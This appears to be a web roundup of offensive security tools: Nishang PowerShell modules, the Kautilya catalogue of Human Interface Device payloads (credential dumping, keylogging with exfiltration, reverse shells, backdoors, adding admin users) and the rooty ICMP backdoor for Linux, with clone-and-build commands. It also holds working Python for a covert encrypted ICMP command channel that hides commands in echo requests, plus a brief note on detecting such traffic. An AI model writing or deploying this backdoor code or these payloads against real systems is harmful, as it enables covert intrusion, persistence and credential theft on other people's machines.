– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence : Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

Kautilya v0.5.6.1- Tool for easy use of Human Interface Devices for offensive security and penetration testing.

Roadmap Changelog
Latest Change 11/2/2016 v0.5.6.1:
+ Added Invoke-PoshRatHttps in the extras directory.
v0.5.6:
– Added “Reverse TCP Shell” under the Execute category.
– Added “Reverse UDP Shell” under the Execute category.
– Added “Reverse ICMP Shell” under the Execute category.
– Added “Reverse HTTPS Shell” under the Execute category.
– Added “Reverse HTTP Shell” under the Execute category.
– Fixed a bug in “Dump passwords in plain”.
– Added a standard disclaimer.

Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking into a computer during penetration tests.

List of Payloads:
Windows
Gather
+ Gather Information
+ Hashdump and Exfiltrate
+ Keylog and Exfiltrate
+ Sniffer
+ WLAN keys dump
+ Get Target Credentials
+ Dump LSA Secrets
+ Dump passwords in plain
+ Copy SAM
+ Dump Process Memory
+ Dump Windows Vault Credentials

Execute
+ Download and Execute
+ Connect to Hotspot and Execute code
+ Code Execution using Powershell
+ Code Execution using DNS TXT queries
+ Download and Execute PowerShell Script
+ Execute ShellCode
+ Reverse TCP Shell

Backdoor
+ Sethc and Utilman backdoor
+ Time based payload execution
+ HTTP backdoor
+ DNS TXT Backdoor
+ Wireless Rogue AP
+ Tracking Target Connectivity
+ Gupt Backdoor

Escalate
+ Remove Update
+ Forceful Browsing

Manage
+ Add an admin user
+ Change the default DNS server
+ Edit the hosts file
+ Add a user and Enable RDP
+ Add a user and Enable Telnet
+ Add a user and Enable Powershell Remoting

Drop Files
+ Drop a MS Word File
+ Drop a MS Excel File
+ Drop a CHM (Compiled HTML Help) file
+ Drop a Shortcut (.LNK) file
+ Drop a JAR file

Misc
+ Browse and Accept Java Signed Applet
+ Speak on Target

Linux
+ Download and Execute
+ Reverse Shells using built in tools
+ Code Execution
+ DNS TXT Code Execution
+ Perl reverse shell (MSF)

OSX
+ Download and Execute
+ DNS TXT Code Execution
+ Perl Reverse Shell (MSF)
+ Ruby Reverse Shell (MSF)

Payloads Compatibility
+ The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8.
+ The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.
+ The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on a VMWare

Usage:

git clone https://github.com/samratashok/Kautilya && cd Kautilya
bundle install
ruby kautilya.rb

Updates:
git pull origin master

Source: https://github.com/samratashok

Updates: rooty – libpcap-based ICMP encrypted backdoor for Linux.

Latest Changes 26/2/2016:
– Removing FreeBSD and CCDC files for now.
– msf & src; Moving everything to ICMP echo request ID.

rooty is based on the idea of SilentDoor: a PCAP-based backdoor for Linux that uses packet sniffing to bypass netfilter, so nothing is bound to a port and no listening socket exists to be found. SilentDoor sniffed for UDP packets on port 53; with the change above, rooty now keys everything off the ICMP echo request ID. Every candidate packet is run through a decryption scheme, and only if it validates is the embedded command executed. The process can be masked to look like any other process. A remote command utility is included.
It also includes the ability to send shellcode for execution and a connectionless shell.
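The following is an added example of the packet-level logic such a backdoor needs, not rooty's code or its wire format: the client hides an authenticated, encrypted command in the payload of an ICMP echo request tagged with a fixed echo ID; the sniffing side inspects every echo request, discards any whose ID, checksum or authentication tag does not validate (ordinary pings included), and only then decrypts and returns the command. The cryptography is stdlib-only and a stand-in, not a recommendation: HMAC-SHA256 for the tag and a SHA-256 counter keystream for confidentiality; that construction, the magic ID and the pre-shared key are assumptions. Packets are built in memory; no raw socket is opened.

```python
"""
Added example, not rooty's code: an ICMP echo-request command channel with
encrypt-then-MAC payloads, selected by a fixed echo ID.  Crypto construction,
MAGIC_ID and the key are assumptions for the example.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

ICMP_ECHO_REQUEST = 8
MAGIC_ID = 0x7E57    # assumption: echo ID that marks "our" packets among ordinary pings
NONCE_LEN = 8
TAG_LEN = 16         # truncated HMAC-SHA256 tag


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """SHA-256 in counter mode; a stand-in for a real stream cipher (assumption)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + struct.pack("!I", counter)).digest()
        counter += 1
    return out[:length]


def seal(key: bytes, command: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Encrypt-then-MAC: nonce || ciphertext || tag."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    ct = bytes(a ^ b for a, b in zip(command, _keystream(key, nonce, len(command))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> Optional[bytes]:
    """Return the command if the tag validates, else None (constant-time compare)."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        return None
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expect = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expect):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


def build_echo_request(key: bytes, command: bytes, seq: int = 1,
                       nonce: Optional[bytes] = None) -> bytes:
    """Client side: ICMP echo request (ICMP header + payload, no IP header)."""
    payload = seal(key, command, nonce)
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, MAGIC_ID, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, MAGIC_ID, seq) + payload


def extract_command(key: bytes, icmp: bytes) -> Optional[bytes]:
    """Backdoor side, applied to every ICMP packet the sniffer hands over.

    None means ordinary ping, wrong ID, bad checksum or bad tag: ignore it."""
    if len(icmp) < 8:
        return None
    typ, code, _csum, ident, _seq = struct.unpack("!BBHHH", icmp[:8])
    if typ != ICMP_ECHO_REQUEST or code != 0 or ident != MAGIC_ID:
        return None
    if icmp_checksum(icmp) != 0:   # a correct packet sums to zero
        return None
    return unseal(key, icmp[8:])


if __name__ == "__main__":
    k = b"shared-secret"                      # assumption: pre-shared key
    pkt = build_echo_request(k, b"id; uname -a")
    print(extract_command(k, pkt))
```

The order of the checks matters for a sniffer that sees every packet on the box: the cheap ID and checksum tests reject almost all traffic before any HMAC is computed, and the tag is verified before anything is decrypted, so a forged or corrupted packet never reaches the command runner. On the detection side the same properties are the tell: echo requests with a constant ID and high-entropy payloads of unusual length, rather than the timestamp-and-pattern payload normal ping tools send.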

+ To build, you only need the libpcap development files installed.
+ Then you should only have to run make.
+ To make a debug build with error messages run: make debug
+ If you have upx installed and would like a packed version: make upx

Now requires https://github.com/SoldierX/libhijack for shellcode injection into other processes.

Installation:

git clone https://github.com/SoldierX/libhijack && cd libhijack
./build.sh

git clone https://github.com/linuxgeek247/rooty && cd rooty
./autojunk.sh
make

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/linuxgeek247
